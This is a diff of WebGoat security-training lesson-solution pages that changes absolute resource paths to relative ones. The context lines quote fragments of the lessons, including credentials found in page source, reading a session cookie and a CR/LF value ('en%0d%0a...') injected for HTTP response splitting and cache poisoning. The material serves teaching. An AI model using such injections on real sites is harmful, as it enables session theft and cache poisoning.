<v:imagedata src="/WebGoat/lesson_solutions/HtmlClues_files/image001.png" o:title=""/>
<v:imagedata src="lesson_solutions/HtmlClues_files/image001.png" o:title=""/>
</v:shape><![endif]--><![if !vml]><img width=640 height=369
src="/WebGoat/lesson_solutions/HtmlClues_files/image011.jpg" v:shapes="Picture_x0020_38"><![endif]></span><span
src="lesson_solutions/HtmlClues_files/image011.jpg" v:shapes="Picture_x0020_38"><![endif]></span><span
style='font-family:"Arial","sans-serif"'><o:p></o:p></span></p>
<p class=MsoCaption><span style='font-family:"Arial","sans-serif"'>Figure </span><!--[if supportFields]><span
@ -579,9 +579,9 @@ the page and select "View source"<o:p></o:p></span></p>
"Arial","sans-serif";mso-no-proof:yes'><!--[if gte vml 1]><v:shape id="Picture_x0020_39"
o:spid="_x0000_i1028" type="#_x0000_t75" style='width:480pt;height:269.25pt;
visibility:visible;mso-wrap-style:square'>
<v:imagedata src="/WebGoat/lesson_solutions/HtmlClues_files/image003.png" o:title="" cropbottom="4255f"/>
<v:imagedata src="lesson_solutions/HtmlClues_files/image003.png" o:title="" cropbottom="4255f"/>
</v:shape><![endif]--><![if !vml]><img width=640 height=359
src="/WebGoat/lesson_solutions/HtmlClues_files/image012.jpg" v:shapes="Picture_x0020_39"><![endif]></span></p>
src="lesson_solutions/HtmlClues_files/image012.jpg" v:shapes="Picture_x0020_39"><![endif]></span></p>
<p class=MsoCaption>Figure <!--[if supportFields]><span style='mso-element:
field-begin'></span><span style='mso-spacerun:yes'> </span>SEQ Figure \* ARABIC
@ -607,9 +607,9 @@ HTML source.<o:p></o:p></span></p>
yes'><!--[if gte vml 1]><v:shape id="Picture_x0020_40" o:spid="_x0000_i1027"
type="#_x0000_t75" style='width:480pt;height:276.75pt;visibility:visible;
mso-wrap-style:square'>
<v:imagedata src="/WebGoat/lesson_solutions/HtmlClues_files/image005.png" o:title=""/>
<v:imagedata src="lesson_solutions/HtmlClues_files/image005.png" o:title=""/>
</v:shape><![endif]--><![if !vml]><img width=640 height=369
src="/WebGoat/lesson_solutions/HtmlClues_files/image013.jpg" v:shapes="Picture_x0020_40"><![endif]></span><span
src="lesson_solutions/HtmlClues_files/image013.jpg" v:shapes="Picture_x0020_40"><![endif]></span><span
style='font-family:"Arial","sans-serif"'><o:p></o:p></span></p>
<p class=MsoNormal><span style='font-family:"Arial","sans-serif"'><o:p>&nbsp;</o:p></span></p>
@ -624,9 +624,9 @@ adminpw. Enter these values in WebGoat and click "Login"<o:p></o:p></span></p>
"Arial","sans-serif";mso-no-proof:yes'><!--[if gte vml 1]><v:shape id="Picture_x0020_41"
o:spid="_x0000_i1026" type="#_x0000_t75" style='width:480pt;height:276.75pt;
visibility:visible;mso-wrap-style:square'>
<v:imagedata src="/WebGoat/lesson_solutions/HtmlClues_files/image007.png" o:title=""/>
<v:imagedata src="lesson_solutions/HtmlClues_files/image007.png" o:title=""/>
</v:shape><![endif]--><![if !vml]><img width=640 height=369
src="/WebGoat/lesson_solutions/HtmlClues_files/image014.jpg" v:shapes="Picture_x0020_41"><![endif]></span><span
src="lesson_solutions/HtmlClues_files/image014.jpg" v:shapes="Picture_x0020_41"><![endif]></span><span
style='font-family:"Arial","sans-serif"'><o:p></o:p></span></p>
<p class=MsoCaption><span style='font-family:"Arial","sans-serif"'>Figure </span><!--[if supportFields]><span
@ -643,9 +643,9 @@ style='font-family:"Arial","sans-serif"'> Enter discovered credentials<o:p></o:p
"Arial","sans-serif";mso-no-proof:yes'><!--[if gte vml 1]><v:shape id="Picture_x0020_42"
o:spid="_x0000_i1025" type="#_x0000_t75" style='width:480pt;height:276.75pt;
visibility:visible;mso-wrap-style:square'>
<v:imagedata src="/WebGoat/lesson_solutions/HtmlClues_files/image009.png" o:title=""/>
<v:imagedata src="lesson_solutions/HtmlClues_files/image009.png" o:title=""/>
</v:shape><![endif]--><![if !vml]><img width=640 height=369
src="/WebGoat/lesson_solutions/HtmlClues_files/image015.jpg" v:shapes="Picture_x0020_42"><![endif]></span><span
src="lesson_solutions/HtmlClues_files/image015.jpg" v:shapes="Picture_x0020_42"><![endif]></span><span
style='font-family:"Arial","sans-serif"'><o:p></o:p></span></p>
<p class=MsoCaption><span style='font-family:"Arial","sans-serif"'>Figure </span><!--[if supportFields]><span

12
webgoat/main/project/WebContent/lesson_solutions/HttpBasics.html
View File

@ -9,8 +9,8 @@ xmlns="http://www.w3.org/TR/REC-html40">
<meta name=ProgId content=Word.Document>
<meta name=Generator content="Microsoft Word 12">
<meta name=Originator content="Microsoft Word 12">
<link rel=File-List href="/WebGoat/lesson_solutions/HttpBasics_files/filelist.xml">
<link rel=Edit-Time-Data href="/WebGoat/lesson_solutions/HttpBasics_files/editdata.mso">
<link rel=File-List href="lesson_solutions/HttpBasics_files/filelist.xml">
<link rel=Edit-Time-Data href="lesson_solutions/HttpBasics_files/editdata.mso">
<!--[if !mso]>
<style>
v\:* {behavior:url(#default#VML);}
@ -36,8 +36,8 @@ w\:* {behavior:url(#default#VML);}
<o:Version>12.00</o:Version>
</o:DocumentProperties>
</xml><![endif]-->
<link rel=themeData href="/WebGoat/lesson_solutions/HttpBasics_files/themedata.thmx">
<link rel=colorSchemeMapping href="/WebGoat/lesson_solutions/HttpBasics_files/colorschememapping.xml">
<link rel=themeData href="lesson_solutions/HttpBasics_files/themedata.thmx">
<link rel=colorSchemeMapping href="lesson_solutions/HttpBasics_files/colorschememapping.xml">
<!--[if gte mso 9]><xml>
<w:WordDocument>
<w:TrackMoves>false</w:TrackMoves>
@ -565,7 +565,7 @@ style='font-family:"Arial","sans-serif"'><o:p></o:p></span></p>
<p class=MsoNormal><span style='font-family:"Arial","sans-serif"'>Add a Proxy on localhost in the settings of your browser. Then you can start WebScarab .We have to select "intercept request" in the tab "Intercept".<o:p></o:p></span></p>
<img src="/WebGoat/lesson_solutions/HttpBasics_files/webscarab1.jpg">
<img src="lesson_solutions/HttpBasics_files/webscarab1.jpg">
<p class=MsoCaption>Figure <!--[if supportFields]><span style='mso-element:
field-begin'></span><span style='mso-spacerun:yes'> </span>SEQ Figure \* ARABIC
@ -581,7 +581,7 @@ name and click the button Go! We get a new WebScarab window, where we can find t
<p class=MsoNormal><span style='font-size:8.0pt;font-family:"Arial","sans-serif"'><o:p>&nbsp;</o:p></span></p>
<img src="/WebGoat/lesson_solutions/HttpBasics_files/webscarab2.jpg">
<img src="lesson_solutions/HttpBasics_files/webscarab2.jpg">
<p class=MsoNormal><span style='font-size:8.0pt;font-family:"Arial","sans-serif"'><o:p>&nbsp;</o:p></span></p>

40
webgoat/main/project/WebContent/lesson_solutions/HttpOnly.html
View File

@ -9,8 +9,8 @@ xmlns="http://www.w3.org/TR/REC-html40">
<meta name=ProgId content=Word.Document>
<meta name=Generator content="Microsoft Word 12">
<meta name=Originator content="Microsoft Word 12">
<link rel=File-List href="/WebGoat/lesson_solutions/HttpOnly_files/filelist.xml">
<link rel=Edit-Time-Data href="/WebGoat/lesson_solutions/HttpOnly_files/editdata.mso">
<link rel=File-List href="lesson_solutions/HttpOnly_files/filelist.xml">
<link rel=Edit-Time-Data href="lesson_solutions/HttpOnly_files/editdata.mso">
<!--[if !mso]>
<style>
v\:* {behavior:url(#default#VML);}
@ -36,8 +36,8 @@ w\:* {behavior:url(#default#VML);}
<o:Version>12.00</o:Version>
</o:DocumentProperties>
</xml><![endif]-->
<link rel=themeData href="/WebGoat/lesson_solutions/HttpOnly_files/themedata.thmx">
<link rel=colorSchemeMapping href="/WebGoat/lesson_solutions/HttpOnly_files/colorschememapping.xml">
<link rel=themeData href="lesson_solutions/HttpOnly_files/themedata.thmx">
<link rel=colorSchemeMapping href="lesson_solutions/HttpOnly_files/colorschememapping.xml">
<!--[if gte mso 9]><xml>
<w:WordDocument>
<w:Zoom>90</w:Zoom>
@ -693,9 +693,9 @@ style='font-family:"Arial","sans-serif";mso-no-proof:yes'><!--[if gte vml 1]><v:
<o:lock v:ext="edit" aspectratio="t"/>
</v:shapetype><v:shape id="Picture_x0020_115" o:spid="_x0000_i1032" type="#_x0000_t75"
style='width:480pt;height:277.5pt;visibility:visible;mso-wrap-style:square'>
<v:imagedata src="/WebGoat/lesson_solutions/HttpOnly_files/image001.png" o:title=""/>
<v:imagedata src="lesson_solutions/HttpOnly_files/image001.png" o:title=""/>
</v:shape><![endif]--><![if !vml]><img width=640 height=370
src="/WebGoat/lesson_solutions/HttpOnly_files/image015.jpg" v:shapes="Picture_x0020_115"><![endif]></span></p>
src="lesson_solutions/HttpOnly_files/image015.jpg" v:shapes="Picture_x0020_115"><![endif]></span></p>
<p class=MsoCaption style='text-align:justify'>Figure <!--[if supportFields]><span
style='mso-element:field-begin'></span><span
@ -722,9 +722,9 @@ normal'><o:p>&nbsp;</o:p></b></p>
style='mso-bidi-font-weight:normal'><span style='mso-no-proof:yes'><!--[if gte vml 1]><v:shape
id="Picture_x0020_117" o:spid="_x0000_i1031" type="#_x0000_t75" style='width:427.5pt;
height:94.5pt;visibility:visible;mso-wrap-style:square'>
<v:imagedata src="/WebGoat/lesson_solutions/HttpOnly_files/image003.png" o:title=""/>
<v:imagedata src="lesson_solutions/HttpOnly_files/image003.png" o:title=""/>
</v:shape><![endif]--><![if !vml]><img width=570 height=126
src="/WebGoat/lesson_solutions/HttpOnly_files/image016.jpg" v:shapes="Picture_x0020_117"><![endif]></span></b></p>
src="lesson_solutions/HttpOnly_files/image016.jpg" v:shapes="Picture_x0020_117"><![endif]></span></b></p>
<p class=MsoCaption style='text-align:justify'>Figure <!--[if supportFields]><span
style='mso-element:field-begin'></span><span
@ -745,9 +745,9 @@ WebScarab.<o:p></o:p></span></p>
style='font-family:"Arial","sans-serif";mso-no-proof:yes'><!--[if gte vml 1]><v:shape
id="Picture_x0020_118" o:spid="_x0000_i1030" type="#_x0000_t75" style='width:481.5pt;
height:344.25pt;visibility:visible;mso-wrap-style:square'>
<v:imagedata src="/WebGoat/lesson_solutions/HttpOnly_files/image005.png" o:title=""/>
<v:imagedata src="lesson_solutions/HttpOnly_files/image005.png" o:title=""/>
</v:shape><![endif]--><![if !vml]><img width=642 height=459
src="/WebGoat/lesson_solutions/HttpOnly_files/image017.jpg" v:shapes="Picture_x0020_118"><![endif]></span></p>
src="lesson_solutions/HttpOnly_files/image017.jpg" v:shapes="Picture_x0020_118"><![endif]></span></p>
<p class=MsoCaption style='text-align:justify'>Figure <!--[if supportFields]><span
style='mso-element:field-begin'></span><span style='mso-spacerun:yes'> </span>SEQ
@ -761,9 +761,9 @@ field-end'></span><![endif]--> HTTP Request</p>
style='mso-no-proof:yes'><!--[if gte vml 1]><v:shape id="Picture_x0020_119"
o:spid="_x0000_i1029" type="#_x0000_t75" style='width:481.5pt;height:344.25pt;
visibility:visible;mso-wrap-style:square'>
<v:imagedata src="/WebGoat/lesson_solutions/HttpOnly_files/image007.png" o:title=""/>
<v:imagedata src="lesson_solutions/HttpOnly_files/image007.png" o:title=""/>
</v:shape><![endif]--><![if !vml]><img width=642 height=459
src="/WebGoat/lesson_solutions/HttpOnly_files/image018.jpg" v:shapes="Picture_x0020_119"><![endif]></span></p>
src="lesson_solutions/HttpOnly_files/image018.jpg" v:shapes="Picture_x0020_119"><![endif]></span></p>
<p class=MsoCaption style='text-align:justify'>Figure <!--[if supportFields]><span
style='mso-element:field-begin'></span><span
@ -783,9 +783,9 @@ on "Read cookie". You will see the JSESSIONID which is not using HTTPOnly.<o:p><
style='mso-no-proof:yes'><!--[if gte vml 1]><v:shape id="Picture_x0020_120"
o:spid="_x0000_i1028" type="#_x0000_t75" style='width:254.25pt;height:94.5pt;
visibility:visible;mso-wrap-style:square'>
<v:imagedata src="/WebGoat/lesson_solutions/HttpOnly_files/image009.png" o:title=""/>
<v:imagedata src="lesson_solutions/HttpOnly_files/image009.png" o:title=""/>
</v:shape><![endif]--><![if !vml]><img width=339 height=126
src="/WebGoat/lesson_solutions/HttpOnly_files/image019.jpg" v:shapes="Picture_x0020_120"><![endif]></span></p>
src="lesson_solutions/HttpOnly_files/image019.jpg" v:shapes="Picture_x0020_120"><![endif]></span></p>
<p class=MsoCaption style='text-align:justify'>Figure <!--[if supportFields]><span
style='mso-element:field-begin'></span><span
@ -799,9 +799,9 @@ style='mso-element:field-end'></span><![endif]--> Only JSESSIONID</p>
style='mso-no-proof:yes'><!--[if gte vml 1]><v:shape id="Picture_x0020_116"
o:spid="_x0000_i1027" type="#_x0000_t75" style='width:480pt;height:277.5pt;
visibility:visible;mso-wrap-style:square'>
<v:imagedata src="/WebGoat/lesson_solutions/HttpOnly_files/image011.png" o:title=""/>
<v:imagedata src="lesson_solutions/HttpOnly_files/image011.png" o:title=""/>
</v:shape><![endif]--><![if !vml]><img width=640 height=370
src="/WebGoat/lesson_solutions/HttpOnly_files/image020.jpg" v:shapes="Picture_x0020_116"><![endif]></span></p>
src="lesson_solutions/HttpOnly_files/image020.jpg" v:shapes="Picture_x0020_116"><![endif]></span></p>
<p class=MsoCaption style='text-align:justify'>Figure <!--[if supportFields]><span
style='mso-element:field-begin'></span><span style='mso-spacerun:yes'> </span>SEQ
@ -820,9 +820,9 @@ on
style='font-family:"Arial","sans-serif";mso-no-proof:yes'><!--[if gte vml 1]><v:shape
id="Picture_x0020_121" o:spid="_x0000_i1026" type="#_x0000_t75" style='width:254.25pt;
height:94.5pt;visibility:visible;mso-wrap-style:square'>
<v:imagedata src="/WebGoat/lesson_solutions/HttpOnly_files/image009.png" o:title=""/>
<v:imagedata src="lesson_solutions/HttpOnly_files/image009.png" o:title=""/>
</v:shape><![endif]--><![if !vml]><img width=339 height=126
src="/WebGoat/lesson_solutions/HttpOnly_files/image019.jpg" v:shapes="Picture_x0020_121"><![endif]></span></p>
src="lesson_solutions/HttpOnly_files/image019.jpg" v:shapes="Picture_x0020_121"><![endif]></span></p>
<p class=MsoCaption style='text-align:justify'>Figure <!--[if supportFields]><span
style='mso-element:field-begin'></span><span
@ -836,9 +836,9 @@ style='mso-element:field-end'></span><![endif]--> JSESSIONID cookie</p>
style='mso-no-proof:yes'><!--[if gte vml 1]><v:shape id="Picture_x0020_122"
o:spid="_x0000_i1025" type="#_x0000_t75" style='width:480pt;height:277.5pt;
visibility:visible;mso-wrap-style:square'>
<v:imagedata src="/WebGoat/lesson_solutions/HttpOnly_files/image013.png" o:title=""/>
<v:imagedata src="lesson_solutions/HttpOnly_files/image013.png" o:title=""/>
</v:shape><![endif]--><![if !vml]><img width=640 height=370
src="/WebGoat/lesson_solutions/HttpOnly_files/image021.jpg" v:shapes="Picture_x0020_122"><![endif]></span></p>
src="lesson_solutions/HttpOnly_files/image021.jpg" v:shapes="Picture_x0020_122"><![endif]></span></p>
<p class=MsoCaption style='text-align:justify'>Figure <!--[if supportFields]><span
style='mso-element:field-begin'></span><span

66
webgoat/main/project/WebContent/lesson_solutions/HttpSplitting.html
View File

@ -9,8 +9,8 @@ xmlns="http://www.w3.org/TR/REC-html40">
<meta name=ProgId content=Word.Document>
<meta name=Generator content="Microsoft Word 12">
<meta name=Originator content="Microsoft Word 12">
<link rel=File-List href="/WebGoat/lesson_solutions/HttpSplitting_files/filelist.xml">
<link rel=Edit-Time-Data href="/WebGoat/lesson_solutions/HttpSplitting_files/editdata.mso">
<link rel=File-List href="lesson_solutions/HttpSplitting_files/filelist.xml">
<link rel=Edit-Time-Data href="lesson_solutions/HttpSplitting_files/editdata.mso">
<!--[if !mso]>
<style>
v\:* {behavior:url(#default#VML);}
@ -36,8 +36,8 @@ w\:* {behavior:url(#default#VML);}
<o:Version>12.00</o:Version>
</o:DocumentProperties>
</xml><![endif]-->
<link rel=themeData href="/WebGoat/lesson_solutions/HttpSplitting_files/themedata.thmx">
<link rel=colorSchemeMapping href="/WebGoat/lesson_solutions/HttpSplitting_files/colorschememapping.xml">
<link rel=themeData href="lesson_solutions/HttpSplitting_files/themedata.thmx">
<link rel=colorSchemeMapping href="lesson_solutions/HttpSplitting_files/colorschememapping.xml">
<!--[if gte mso 9]><xml>
<w:WordDocument>
<w:Zoom>90</w:Zoom>
@ -725,9 +725,9 @@ exploited successfully you will find the green check in the left menu.<o:p></o:p
<o:lock v:ext="edit" aspectratio="t"/>
</v:shapetype><v:shape id="Picture_x0020_159" o:spid="_x0000_i1038" type="#_x0000_t75"
style='width:480pt;height:277.5pt;visibility:visible;mso-wrap-style:square'>
<v:imagedata src="/WebGoat/lesson_solutions/HttpSplitting_files/image001.png" o:title=""/>
<v:imagedata src="lesson_solutions/HttpSplitting_files/image001.png" o:title=""/>
</v:shape><![endif]--><![if !vml]><img width=640 height=370
src="/WebGoat/lesson_solutions/HttpSplitting_files/image029.jpg" v:shapes="Picture_x0020_159"><![endif]></span></p>
src="lesson_solutions/HttpSplitting_files/image029.jpg" v:shapes="Picture_x0020_159"><![endif]></span></p>
<p class=MsoNormal><o:p>&nbsp;</o:p></p>
@ -756,9 +756,9 @@ requests and responses?<o:p></o:p></span></p>
"Arial","sans-serif";mso-no-proof:yes'><!--[if gte vml 1]><v:shape id="Picture_x0020_160"
o:spid="_x0000_i1037" type="#_x0000_t75" style='width:480pt;height:277.5pt;
visibility:visible;mso-wrap-style:square'>
<v:imagedata src="/WebGoat/lesson_solutions/HttpSplitting_files/image003.png" o:title=""/>
<v:imagedata src="lesson_solutions/HttpSplitting_files/image003.png" o:title=""/>
</v:shape><![endif]--><![if !vml]><img width=640 height=370
src="/WebGoat/lesson_solutions/HttpSplitting_files/image030.jpg" v:shapes="Picture_x0020_160"><![endif]></span></p>
src="lesson_solutions/HttpSplitting_files/image030.jpg" v:shapes="Picture_x0020_160"><![endif]></span></p>
<p class=MsoCaption>Figure <!--[if supportFields]><span style='mso-element:
field-begin'></span><span style='mso-spacerun:yes'> </span>SEQ Figure \* ARABIC
@ -770,9 +770,9 @@ field-end'></span><![endif]--> Language en</p>
yes'><!--[if gte vml 1]><v:shape id="Picture_x0020_161" o:spid="_x0000_i1036"
type="#_x0000_t75" style='width:481.5pt;height:344.25pt;visibility:visible;
mso-wrap-style:square'>
<v:imagedata src="/WebGoat/lesson_solutions/HttpSplitting_files/image005.png" o:title=""/>
<v:imagedata src="lesson_solutions/HttpSplitting_files/image005.png" o:title=""/>
</v:shape><![endif]--><![if !vml]><img width=642 height=459
src="/WebGoat/lesson_solutions/HttpSplitting_files/image031.jpg" v:shapes="Picture_x0020_161"><![endif]></span></p>
src="lesson_solutions/HttpSplitting_files/image031.jpg" v:shapes="Picture_x0020_161"><![endif]></span></p>
<p class=MsoCaption>Figure <!--[if supportFields]><span style='mso-element:
field-begin'></span><span style='mso-spacerun:yes'> </span>SEQ Figure \* ARABIC
@ -786,9 +786,9 @@ field-end'></span><![endif]--> HTTP Request</p>
yes'><!--[if gte vml 1]><v:shape id="Picture_x0020_162" o:spid="_x0000_i1035"
type="#_x0000_t75" style='width:481.5pt;height:344.25pt;visibility:visible;
mso-wrap-style:square'>
<v:imagedata src="/WebGoat/lesson_solutions/HttpSplitting_files/image007.png" o:title=""/>
<v:imagedata src="lesson_solutions/HttpSplitting_files/image007.png" o:title=""/>
</v:shape><![endif]--><![if !vml]><img width=642 height=459
src="/WebGoat/lesson_solutions/HttpSplitting_files/image032.jpg" v:shapes="Picture_x0020_162"><![endif]></span></p>
src="lesson_solutions/HttpSplitting_files/image032.jpg" v:shapes="Picture_x0020_162"><![endif]></span></p>
<p class=MsoCaption>Figure <!--[if supportFields]><span style='mso-element:
field-begin'></span><span style='mso-spacerun:yes'> </span>SEQ Figure \* ARABIC
@ -802,9 +802,9 @@ field-end'></span><![endif]--> First HTTP Response</p>
yes'><!--[if gte vml 1]><v:shape id="Picture_x0020_163" o:spid="_x0000_i1034"
type="#_x0000_t75" style='width:481.5pt;height:344.25pt;visibility:visible;
mso-wrap-style:square'>
<v:imagedata src="/WebGoat/lesson_solutions/HttpSplitting_files/image009.png" o:title=""/>
<v:imagedata src="lesson_solutions/HttpSplitting_files/image009.png" o:title=""/>
</v:shape><![endif]--><![if !vml]><img width=642 height=459
src="/WebGoat/lesson_solutions/HttpSplitting_files/image033.jpg" v:shapes="Picture_x0020_163"><![endif]></span></p>
src="lesson_solutions/HttpSplitting_files/image033.jpg" v:shapes="Picture_x0020_163"><![endif]></span></p>
<p class=MsoCaption>Figure <!--[if supportFields]><span style='mso-element:
field-begin'></span><span style='mso-spacerun:yes'> </span>SEQ Figure \* ARABIC
@ -823,9 +823,9 @@ for the language en%0d%0a%0d%0a%0d%0a<o:p></o:p></span></p>
"Arial","sans-serif";mso-no-proof:yes'><!--[if gte vml 1]><v:shape id="Picture_x0020_164"
o:spid="_x0000_i1033" type="#_x0000_t75" style='width:481.5pt;height:344.25pt;
visibility:visible;mso-wrap-style:square'>
<v:imagedata src="/WebGoat/lesson_solutions/HttpSplitting_files/image011.png" o:title=""/>
<v:imagedata src="lesson_solutions/HttpSplitting_files/image011.png" o:title=""/>
</v:shape><![endif]--><![if !vml]><img width=642 height=459
src="/WebGoat/lesson_solutions/HttpSplitting_files/image034.jpg" v:shapes="Picture_x0020_164"><![endif]></span></p>
src="lesson_solutions/HttpSplitting_files/image034.jpg" v:shapes="Picture_x0020_164"><![endif]></span></p>
<p class=MsoCaption>Figure <!--[if supportFields]><span style='mso-element:
field-begin'></span><span style='mso-spacerun:yes'> </span>SEQ Figure \* ARABIC
@ -839,9 +839,9 @@ field-end'></span><![endif]--> First HTTP Request</p>
yes'><!--[if gte vml 1]><v:shape id="Picture_x0020_165" o:spid="_x0000_i1032"
type="#_x0000_t75" style='width:481.5pt;height:344.25pt;visibility:visible;
mso-wrap-style:square'>
<v:imagedata src="/WebGoat/lesson_solutions/HttpSplitting_files/image013.png" o:title=""/>
<v:imagedata src="lesson_solutions/HttpSplitting_files/image013.png" o:title=""/>
</v:shape><![endif]--><![if !vml]><img width=642 height=459
src="/WebGoat/lesson_solutions/HttpSplitting_files/image035.jpg" v:shapes="Picture_x0020_165"><![endif]></span></p>
src="lesson_solutions/HttpSplitting_files/image035.jpg" v:shapes="Picture_x0020_165"><![endif]></span></p>
<p class=MsoCaption>Figure <!--[if supportFields]><span style='mso-element:
field-begin'></span><span style='mso-spacerun:yes'> </span>SEQ Figure \* ARABIC
@ -872,9 +872,9 @@ Wingdings'>J</span></span><span style='font-family:"Arial","sans-serif"'>&lt;/ht
"Arial","sans-serif";mso-no-proof:yes'><!--[if gte vml 1]><v:shape id="Picture_x0020_166"
o:spid="_x0000_i1031" type="#_x0000_t75" style='width:481.5pt;height:344.25pt;
visibility:visible;mso-wrap-style:square'>
<v:imagedata src="/WebGoat/lesson_solutions/HttpSplitting_files/image015.png" o:title=""/>
<v:imagedata src="lesson_solutions/HttpSplitting_files/image015.png" o:title=""/>
</v:shape><![endif]--><![if !vml]><img width=642 height=459
src="/WebGoat/lesson_solutions/HttpSplitting_files/image036.jpg" v:shapes="Picture_x0020_166"><![endif]></span></p>
src="lesson_solutions/HttpSplitting_files/image036.jpg" v:shapes="Picture_x0020_166"><![endif]></span></p>
<p class=MsoCaption>Figure <!--[if supportFields]><span style='mso-element:
field-begin'></span><span style='mso-spacerun:yes'> </span>SEQ Figure \* ARABIC
@ -888,9 +888,9 @@ field-end'></span><![endif]--> HTTP Splitting attack</p>
yes'><!--[if gte vml 1]><v:shape id="Picture_x0020_167" o:spid="_x0000_i1030"
type="#_x0000_t75" style='width:481.5pt;height:344.25pt;visibility:visible;
mso-wrap-style:square'>
<v:imagedata src="/WebGoat/lesson_solutions/HttpSplitting_files/image017.png" o:title=""/>
<v:imagedata src="lesson_solutions/HttpSplitting_files/image017.png" o:title=""/>
</v:shape><![endif]--><![if !vml]><img width=642 height=459
src="/WebGoat/lesson_solutions/HttpSplitting_files/image037.jpg" v:shapes="Picture_x0020_167"><![endif]></span></p>
src="lesson_solutions/HttpSplitting_files/image037.jpg" v:shapes="Picture_x0020_167"><![endif]></span></p>
<p class=MsoCaption>Figure <!--[if supportFields]><span style='mso-element:
field-begin'></span><span style='mso-spacerun:yes'> </span>SEQ Figure \* ARABIC
@ -904,9 +904,9 @@ field-end'></span><![endif]--> HTTP Response</p>
yes'><!--[if gte vml 1]><v:shape id="Picture_x0020_168" o:spid="_x0000_i1029"
type="#_x0000_t75" style='width:481.5pt;height:344.25pt;visibility:visible;
mso-wrap-style:square'>
<v:imagedata src="/WebGoat/lesson_solutions/HttpSplitting_files/image019.png" o:title=""/>
<v:imagedata src="lesson_solutions/HttpSplitting_files/image019.png" o:title=""/>
</v:shape><![endif]--><![if !vml]><img width=642 height=459
src="/WebGoat/lesson_solutions/HttpSplitting_files/image038.jpg" v:shapes="Picture_x0020_168"><![endif]></span></p>
src="lesson_solutions/HttpSplitting_files/image038.jpg" v:shapes="Picture_x0020_168"><![endif]></span></p>
<p class=MsoCaption>Figure <!--[if supportFields]><span style='mso-element:
field-begin'></span><span style='mso-spacerun:yes'> </span>SEQ Figure \* ARABIC
@ -920,9 +920,9 @@ field-end'></span><![endif]--> Second HTTP Request</p>
yes'><!--[if gte vml 1]><v:shape id="Picture_x0020_169" o:spid="_x0000_i1028"
type="#_x0000_t75" style='width:481.5pt;height:344.25pt;visibility:visible;
mso-wrap-style:square'>
<v:imagedata src="/WebGoat/lesson_solutions/HttpSplitting_files/image021.png" o:title=""/>
<v:imagedata src="lesson_solutions/HttpSplitting_files/image021.png" o:title=""/>
</v:shape><![endif]--><![if !vml]><img width=642 height=459
src="/WebGoat/lesson_solutions/HttpSplitting_files/image039.jpg" v:shapes="Picture_x0020_169"><![endif]></span></p>
src="lesson_solutions/HttpSplitting_files/image039.jpg" v:shapes="Picture_x0020_169"><![endif]></span></p>
<p class=MsoCaption>Figure <!--[if supportFields]><span style='mso-element:
field-begin'></span><span style='mso-spacerun:yes'> </span>SEQ Figure \* ARABIC
@ -936,9 +936,9 @@ style='mso-element:field-end'></span><![endif]--> Second HTTP Response</p>
yes'><!--[if gte vml 1]><v:shape id="Picture_x0020_170" o:spid="_x0000_i1027"
type="#_x0000_t75" style='width:480pt;height:277.5pt;visibility:visible;
mso-wrap-style:square'>
<v:imagedata src="/WebGoat/lesson_solutions/HttpSplitting_files/image023.png" o:title=""/>
<v:imagedata src="lesson_solutions/HttpSplitting_files/image023.png" o:title=""/>
</v:shape><![endif]--><![if !vml]><img width=640 height=370
src="/WebGoat/lesson_solutions/HttpSplitting_files/image040.jpg" v:shapes="Picture_x0020_170"><![endif]></span></p>
src="lesson_solutions/HttpSplitting_files/image040.jpg" v:shapes="Picture_x0020_170"><![endif]></span></p>
<p class=MsoCaption>Figure <!--[if supportFields]><span style='mso-element:
field-begin'></span><span style='mso-spacerun:yes'> </span>SEQ Figure \* ARABIC
@ -957,9 +957,9 @@ button of your browser.<o:p></o:p></span></p>
"Arial","sans-serif";mso-no-proof:yes'><!--[if gte vml 1]><v:shape id="Picture_x0020_171"
o:spid="_x0000_i1026" type="#_x0000_t75" style='width:480pt;height:277.5pt;
visibility:visible;mso-wrap-style:square'>
<v:imagedata src="/WebGoat/lesson_solutions/HttpSplitting_files/image025.png" o:title=""/>
<v:imagedata src="lesson_solutions/HttpSplitting_files/image025.png" o:title=""/>
</v:shape><![endif]--><![if !vml]><img width=640 height=370
src="/WebGoat/lesson_solutions/HttpSplitting_files/image041.jpg" v:shapes="Picture_x0020_171"><![endif]></span></p>
src="lesson_solutions/HttpSplitting_files/image041.jpg" v:shapes="Picture_x0020_171"><![endif]></span></p>
<p class=MsoCaption>Figure <!--[if supportFields]><span style='mso-element:
field-begin'></span><span style='mso-spacerun:yes'> </span>SEQ Figure \* ARABIC
@ -991,9 +991,9 @@ Wingdings'>J</span></span><span style='font-family:"Arial","sans-serif"'>&lt;/ht
yes'><!--[if gte vml 1]><v:shape id="Picture_x0020_172" o:spid="_x0000_i1025"
type="#_x0000_t75" style='width:480pt;height:277.5pt;visibility:visible;
mso-wrap-style:square'>
<v:imagedata src="/WebGoat/lesson_solutions/HttpSplitting_files/image027.png" o:title=""/>
<v:imagedata src="lesson_solutions/HttpSplitting_files/image027.png" o:title=""/>
</v:shape><![endif]--><![if !vml]><img width=640 height=370
src="/WebGoat/lesson_solutions/HttpSplitting_files/image042.jpg" v:shapes="Picture_x0020_172"><![endif]></span></p>
src="lesson_solutions/HttpSplitting_files/image042.jpg" v:shapes="Picture_x0020_172"><![endif]></span></p>
<p class=MsoCaption>Figure <!--[if supportFields]><span style='mso-element:
field-begin'></span><span style='mso-spacerun:yes'> </span>SEQ Figure \* ARABIC
@ -1009,7 +1009,7 @@ style='mso-element:field-end'></span><![endif]--> Inject cache poisoning</p>
<td valign='MIDDLE' width='100%' align='RIGHT class=MsoNormal' style='font-family:"Arial","sans-serif"'>
Solution by Erwin Geirnaert
</td>
<td valign='MIDDLE' align='RIGHT'><img hspace='0' vspace='0' border='0' alt='ZION SECURITY' src='/WebGoat/images/logos/zionsecurity.gif'></td>
<td valign='MIDDLE' align='RIGHT'><img hspace='0' vspace='0' border='0' alt='ZION SECURITY' src='images/logos/zionsecurity.gif'></td>
</tr>
</table>

2
webgoat/main/project/WebContent/lesson_solutions/InsecureLogin.html
View File

@ -3,7 +3,7 @@
<head>
<meta http-equiv="Content-Type" content="text/html; charset=ISO-8859-1">
<title>Insecure Login</title>
<link rel="stylesheet" type="text/css" href="/WebGoat/lesson_solutions/formate.css">
<link rel="stylesheet" type="text/css" href="lesson_solutions/formate.css">
</head>
<body>
<p><b>Lesson Plan Title:</b>Insecure Login</p>

32
webgoat/main/project/WebContent/lesson_solutions/JSONInjection.html
View File

@ -9,8 +9,8 @@ xmlns="http://www.w3.org/TR/REC-html40">
<meta name=ProgId content=Word.Document>
<meta name=Generator content="Microsoft Word 12">
<meta name=Originator content="Microsoft Word 12">
